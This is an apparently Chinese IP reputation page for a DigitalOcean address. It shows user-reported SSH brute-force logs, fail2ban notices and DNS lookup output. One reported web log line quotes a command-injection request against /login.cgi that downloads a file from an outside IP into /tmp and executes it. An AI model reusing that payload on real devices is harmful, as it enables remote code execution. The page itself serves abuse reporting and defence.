142.93.246.42 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States of America

运营商(isp): DigitalOcean LLC

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackspambots	SSH Login Bruteforce	2020-09-08 03:09:58
attackbots	Sep 7 12:26:05 MainVPS sshd[10732]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Sep 7 12:26:07 MainVPS sshd[10732]: Failed password for root from 142.93.246.42 port 47020 ssh2 Sep 7 12:30:04 MainVPS sshd[16861]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Sep 7 12:30:06 MainVPS sshd[16861]: Failed password for root from 142.93.246.42 port 46532 ssh2 Sep 7 12:33:51 MainVPS sshd[24197]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Sep 7 12:33:53 MainVPS sshd[24197]: Failed password for root from 142.93.246.42 port 46046 ssh2 ...	2020-09-07 18:38:58
attackspambots	(sshd) Failed SSH login from 142.93.246.42 (US/United States/-): 5 in the last 3600 secs	2020-08-28 21:43:03
attackbots	invalid user	2020-08-28 15:27:02
attack	'Fail2Ban'	2020-08-24 09:25:39
attackspam	2020-08-22T08:15:33.389407vps751288.ovh.net sshd\[26569\]: Invalid user jana from 142.93.246.42 port 43498 2020-08-22T08:15:33.398096vps751288.ovh.net sshd\[26569\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 2020-08-22T08:15:35.118809vps751288.ovh.net sshd\[26569\]: Failed password for invalid user jana from 142.93.246.42 port 43498 ssh2 2020-08-22T08:19:33.967472vps751288.ovh.net sshd\[26595\]: Invalid user alexandra from 142.93.246.42 port 52482 2020-08-22T08:19:33.973702vps751288.ovh.net sshd\[26595\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42	2020-08-22 14:40:16
attackbots	Aug 20 14:50:22 sso sshd[15567]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 Aug 20 14:50:24 sso sshd[15567]: Failed password for invalid user lfd from 142.93.246.42 port 45452 ssh2 ...	2020-08-20 21:43:59
attackspambots	Cowrie Honeypot: 3 unauthorised SSH/Telnet login attempts between 2020-08-20T12:03:59Z and 2020-08-20T12:11:51Z	2020-08-20 20:11:59
attackspambots	2020-08-19T04:07:01.641367shield sshd\[24416\]: Invalid user lqx from 142.93.246.42 port 59456 2020-08-19T04:07:01.650018shield sshd\[24416\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 2020-08-19T04:07:03.669370shield sshd\[24416\]: Failed password for invalid user lqx from 142.93.246.42 port 59456 ssh2 2020-08-19T04:10:41.269912shield sshd\[24696\]: Invalid user admin from 142.93.246.42 port 39044 2020-08-19T04:10:41.278362shield sshd\[24696\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42	2020-08-19 12:40:19
attack	Automatic Fail2ban report - Trying login SSH	2020-08-19 04:27:33
attackspam	fail2ban/Aug 15 01:39:24 h1962932 sshd[10329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Aug 15 01:39:26 h1962932 sshd[10329]: Failed password for root from 142.93.246.42 port 56728 ssh2 Aug 15 01:43:47 h1962932 sshd[10531]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Aug 15 01:43:49 h1962932 sshd[10531]: Failed password for root from 142.93.246.42 port 37618 ssh2 Aug 15 01:48:07 h1962932 sshd[13310]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Aug 15 01:48:09 h1962932 sshd[13310]: Failed password for root from 142.93.246.42 port 46740 ssh2	2020-08-15 08:57:53
attackbots	Aug 7 13:53:13 ovpn sshd\[15541\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Aug 7 13:53:16 ovpn sshd\[15541\]: Failed password for root from 142.93.246.42 port 50526 ssh2 Aug 7 13:58:57 ovpn sshd\[17913\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Aug 7 13:58:59 ovpn sshd\[17913\]: Failed password for root from 142.93.246.42 port 36444 ssh2 Aug 7 14:00:40 ovpn sshd\[18709\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root	2020-08-08 03:10:29
attackspam	2020-08-04T14:33:10+0200 Failed SSH Authentication/Brute Force Attack. (Server 9)	2020-08-04 22:21:58
attackspam	Jul 28 00:44:41 gospond sshd[26578]: Invalid user liuziyuan from 142.93.246.42 port 55216 Jul 28 00:44:43 gospond sshd[26578]: Failed password for invalid user liuziyuan from 142.93.246.42 port 55216 ssh2 Jul 28 00:45:56 gospond sshd[26595]: Invalid user sxltzxkt from 142.93.246.42 port 42322 ...	2020-07-28 07:51:31
attackbotsspam	$f2bV_matches	2020-07-27 01:10:48
attack	Jul 23 20:22:13 ns382633 sshd\[14117\]: Invalid user romulo from 142.93.246.42 port 37092 Jul 23 20:22:13 ns382633 sshd\[14117\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 Jul 23 20:22:14 ns382633 sshd\[14117\]: Failed password for invalid user romulo from 142.93.246.42 port 37092 ssh2 Jul 23 20:30:02 ns382633 sshd\[15175\]: Invalid user gitlab-runner from 142.93.246.42 port 40638 Jul 23 20:30:02 ns382633 sshd\[15175\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42	2020-07-24 02:34:04
attackbotsspam	$f2bV_matches	2020-07-23 00:34:06
attackspambots	Jul 19 06:22:44 ny01 sshd[21270]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 Jul 19 06:22:46 ny01 sshd[21270]: Failed password for invalid user nor from 142.93.246.42 port 53458 ssh2 Jul 19 06:24:33 ny01 sshd[21449]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42	2020-07-19 18:59:30
attackspam	2020-07-16T10:31:40+0200 Failed SSH Authentication/Brute Force Attack. (Server 10)	2020-07-16 18:10:09
attackbots	Jul 7 07:25:21 PorscheCustomer sshd[8035]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 Jul 7 07:25:23 PorscheCustomer sshd[8035]: Failed password for invalid user jessica from 142.93.246.42 port 40628 ssh2 Jul 7 07:28:44 PorscheCustomer sshd[8212]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 ...	2020-07-07 16:14:23
attackspambots	SSH Bruteforce attack	2020-07-03 22:57:48
attackbots	2020-06-29T22:55:06.615667abusebot.cloudsearch.cf sshd[25556]: Invalid user gt from 142.93.246.42 port 50744 2020-06-29T22:55:06.620753abusebot.cloudsearch.cf sshd[25556]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 2020-06-29T22:55:06.615667abusebot.cloudsearch.cf sshd[25556]: Invalid user gt from 142.93.246.42 port 50744 2020-06-29T22:55:07.967600abusebot.cloudsearch.cf sshd[25556]: Failed password for invalid user gt from 142.93.246.42 port 50744 ssh2 2020-06-29T22:58:40.004605abusebot.cloudsearch.cf sshd[25734]: Invalid user ftw from 142.93.246.42 port 50858 2020-06-29T22:58:40.009666abusebot.cloudsearch.cf sshd[25734]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 2020-06-29T22:58:40.004605abusebot.cloudsearch.cf sshd[25734]: Invalid user ftw from 142.93.246.42 port 50858 2020-06-29T22:58:42.069002abusebot.cloudsearch.cf sshd[25734]: Failed password for invalid user ft ...	2020-06-30 07:59:21
attack	Jun 24 15:04:40 h1745522 sshd[28789]: Invalid user phil from 142.93.246.42 port 58670 Jun 24 15:04:40 h1745522 sshd[28789]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 Jun 24 15:04:40 h1745522 sshd[28789]: Invalid user phil from 142.93.246.42 port 58670 Jun 24 15:04:42 h1745522 sshd[28789]: Failed password for invalid user phil from 142.93.246.42 port 58670 ssh2 Jun 24 15:07:53 h1745522 sshd[28905]: Invalid user dai from 142.93.246.42 port 59036 Jun 24 15:07:53 h1745522 sshd[28905]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 Jun 24 15:07:53 h1745522 sshd[28905]: Invalid user dai from 142.93.246.42 port 59036 Jun 24 15:07:55 h1745522 sshd[28905]: Failed password for invalid user dai from 142.93.246.42 port 59036 ssh2 Jun 24 15:11:05 h1745522 sshd[29179]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Jun 24 ...	2020-06-24 21:43:30
attack	Jun 24 09:57:29 jumpserver sshd[198740]: Failed password for root from 142.93.246.42 port 44052 ssh2 Jun 24 10:00:46 jumpserver sshd[198783]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.246.42 user=root Jun 24 10:00:48 jumpserver sshd[198783]: Failed password for root from 142.93.246.42 port 45026 ssh2 ...	2020-06-24 18:23:30

相同子网IP讨论:

IP	类型	评论内容	时间
142.93.246.239	attackspambots	ssh brute force	2020-03-09 13:52:17

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 142.93.246.42
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 38431
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;142.93.246.42.			IN	A

;; AUTHORITY SECTION:
.			408	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020062400 1800 900 604800 86400

;; Query time: 56 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Jun 24 18:23:23 CST 2020
;; MSG SIZE  rcvd: 117

HOST信息:

Host 42.246.93.142.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 42.246.93.142.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
71.6.233.145	attackspambots	" "	2019-07-15 05:39:52
151.30.31.201	attackspambots	151.30.31.201 - - [14/Jul/2019:23:17:40 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 166 "-" "ELEMENT/2.0" ...	2019-07-15 05:37:21
164.132.38.167	attack	Jul 15 03:00:50 vibhu-HP-Z238-Microtower-Workstation sshd\[24020\]: Invalid user quange from 164.132.38.167 Jul 15 03:00:50 vibhu-HP-Z238-Microtower-Workstation sshd\[24020\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.38.167 Jul 15 03:00:52 vibhu-HP-Z238-Microtower-Workstation sshd\[24020\]: Failed password for invalid user quange from 164.132.38.167 port 42959 ssh2 Jul 15 03:05:23 vibhu-HP-Z238-Microtower-Workstation sshd\[24200\]: Invalid user ingrid from 164.132.38.167 Jul 15 03:05:23 vibhu-HP-Z238-Microtower-Workstation sshd\[24200\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.38.167 ...	2019-07-15 05:38:40
80.245.118.122	attackbotsspam	[portscan] Port scan	2019-07-15 06:08:33
128.199.143.163	attackspambots	Invalid user backup from 128.199.143.163 port 47860	2019-07-15 06:06:35
115.186.148.38	attackspam	Jul 14 23:29:06 eventyay sshd[7849]: Failed password for root from 115.186.148.38 port 12634 ssh2 Jul 14 23:34:55 eventyay sshd[9169]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=115.186.148.38 Jul 14 23:34:56 eventyay sshd[9169]: Failed password for invalid user dp from 115.186.148.38 port 10535 ssh2 ...	2019-07-15 05:41:22
159.69.77.184	attackspam	masters-of-media.de 159.69.77.184 \[14/Jul/2019:23:16:49 +0200\] "POST /wp-login.php HTTP/1.1" 200 5855 "-" "Mozilla/5.0 $X11\; Ubuntu\; Linux x86_64\; rv:62.0$ Gecko/20100101 Firefox/62.0" masters-of-media.de 159.69.77.184 \[14/Jul/2019:23:16:50 +0200\] "POST /wp-login.php HTTP/1.1" 200 5810 "-" "Mozilla/5.0 $X11\; Ubuntu\; Linux x86_64\; rv:62.0$ Gecko/20100101 Firefox/62.0" masters-of-media.de 159.69.77.184 \[14/Jul/2019:23:16:50 +0200\] "POST /xmlrpc.php HTTP/1.1" 200 4102 "-" "Mozilla/5.0 $X11\; Ubuntu\; Linux x86_64\; rv:62.0$ Gecko/20100101 Firefox/62.0"	2019-07-15 06:06:00
198.199.113.209	attackspambots	2019-07-14T21:17:33.303348abusebot-4.cloudsearch.cf sshd\[17177\]: Invalid user global from 198.199.113.209 port 35778	2019-07-15 05:42:00
118.24.219.111	attackspam	Jul 14 17:43:19 TORMINT sshd\[1851\]: Invalid user adv from 118.24.219.111 Jul 14 17:43:19 TORMINT sshd\[1851\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.219.111 Jul 14 17:43:21 TORMINT sshd\[1851\]: Failed password for invalid user adv from 118.24.219.111 port 58360 ssh2 ...	2019-07-15 05:48:03
158.69.22.218	attackbots	Jul 14 23:30:48 eventyay sshd[8140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=158.69.22.218 Jul 14 23:30:49 eventyay sshd[8140]: Failed password for invalid user gregor from 158.69.22.218 port 49576 ssh2 Jul 14 23:35:31 eventyay sshd[9441]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=158.69.22.218 ...	2019-07-15 05:51:34
200.172.91.170	attackbots	Jul 14 23:29:11 eventyay sshd[7852]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=200.172.91.170 Jul 14 23:29:13 eventyay sshd[7852]: Failed password for invalid user redis from 200.172.91.170 port 41139 ssh2 Jul 14 23:35:16 eventyay sshd[9421]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=200.172.91.170 ...	2019-07-15 05:50:19
68.183.133.21	attackspam	Jul 14 23:42:36 giegler sshd[20289]: Invalid user henry from 68.183.133.21 port 54450	2019-07-15 05:59:46
14.98.4.82	attack	Jul 14 23:17:46 mout sshd[1668]: Invalid user testuser from 14.98.4.82 port 5129	2019-07-15 05:35:03
211.23.61.194	attack	Jul 15 02:59:57 vibhu-HP-Z238-Microtower-Workstation sshd\[23992\]: Invalid user nagios from 211.23.61.194 Jul 15 02:59:57 vibhu-HP-Z238-Microtower-Workstation sshd\[23992\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=211.23.61.194 Jul 15 02:59:59 vibhu-HP-Z238-Microtower-Workstation sshd\[23992\]: Failed password for invalid user nagios from 211.23.61.194 port 50220 ssh2 Jul 15 03:05:27 vibhu-HP-Z238-Microtower-Workstation sshd\[24212\]: Invalid user ma from 211.23.61.194 Jul 15 03:05:27 vibhu-HP-Z238-Microtower-Workstation sshd\[24212\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=211.23.61.194 ...	2019-07-15 05:43:46
27.34.245.238	attackspambots	Invalid user mr from 27.34.245.238 port 40752 pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.34.245.238 Failed password for invalid user mr from 27.34.245.238 port 40752 ssh2 Invalid user marisa from 27.34.245.238 port 55124 pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.34.245.238	2019-07-15 05:36:48

最近上报的IP列表

78.90.247.14	112.215.210.141	240.124.169.197	195.146.59.157
35.196.75.48	220.191.229.133	140.138.221.79	103.205.129.171
66.186.7.124	1.131.102.211	200.108.240.59	214.133.12.137
218.243.161.3	161.47.74.106	15.226.249.21	110.4.14.81
103.142.21.118	242.97.73.245	159.8.49.95	103.131.71.96